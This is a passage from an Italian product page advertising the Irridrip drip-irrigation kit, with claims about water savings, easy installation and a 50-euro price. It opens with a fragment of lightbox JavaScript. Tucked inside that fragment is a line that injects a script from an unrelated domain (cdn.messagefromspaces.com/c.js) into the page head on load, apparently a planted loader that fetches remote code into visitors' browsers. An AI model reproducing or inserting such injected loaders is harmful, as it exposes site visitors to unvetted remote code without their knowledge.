, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Vantaggi di Irridrip

Irridrip è un sistema di irrigazione progettato per ridurre al minimo le perdite, sia durante l’approvigionamento che la distribuzione dell’acqua. In questo modo Irridrip, oltre a soddisfare le esigenze del tuo orto, ti permette di evitare ogni spreco, sotto il profilo dei consumi d’acqua e di CO2. Tutto questo con un piccolo investimento e con una grandissima affidabilità, versatilità e semplicità d’uso.

 

Rispetto dell’ambiente

Grazie al sistema Irridrip potrai ridurre i tuoi consumi di acqua almeno del 40% rispetto a sistemi di irrigazione più tradizionali, senza inficiare la produttività del tuo orto. La riduzione porterà inoltre benefici ambientali (riduzione di emissioni di Co2), derivanti dalla riduzione di utilizzo delle pompe idrauliche connesse alle utenze domestiche ed agricole.

 

Formato famiglia

Il kit Irridrip è stato studiato per poter rispondere al fabbisogno di una famiglia tipo, composta da quattro persone. A te la scelta delle colture da piantare! Nella sezione “Consigli” potrai consultare il calendario delle semine e le tipologie di orti che il nostro agronomo propone in base a condizioni climatiche e necessità idriche delle piante stesse.

 

Facile installazione

L’installazione e la posa a terra del kit è rapida e alla portata di tutti. In cinque semplici step potrai disporre il sistema di irrigazione sul terreno, per poter comodamente iniziare a far crescere le colture che preferisci. Per poter completare l’installazione dovrai munirti unicamente di un paio di forbici, utili al taglio delle linee di gocciolamento. Nulla di più facile!

 

Risparmio garantito

Pensiamo che proporre un buon prodotto ad un prezzo contenuto sia fondamentale per potersi confrontare sul mercato. Molti dei nostri sforzi si sono appunto concentrati sulla ricerca del giusto equilibrio tra qualità e prezzo. Prezzo di vendita 50 euro.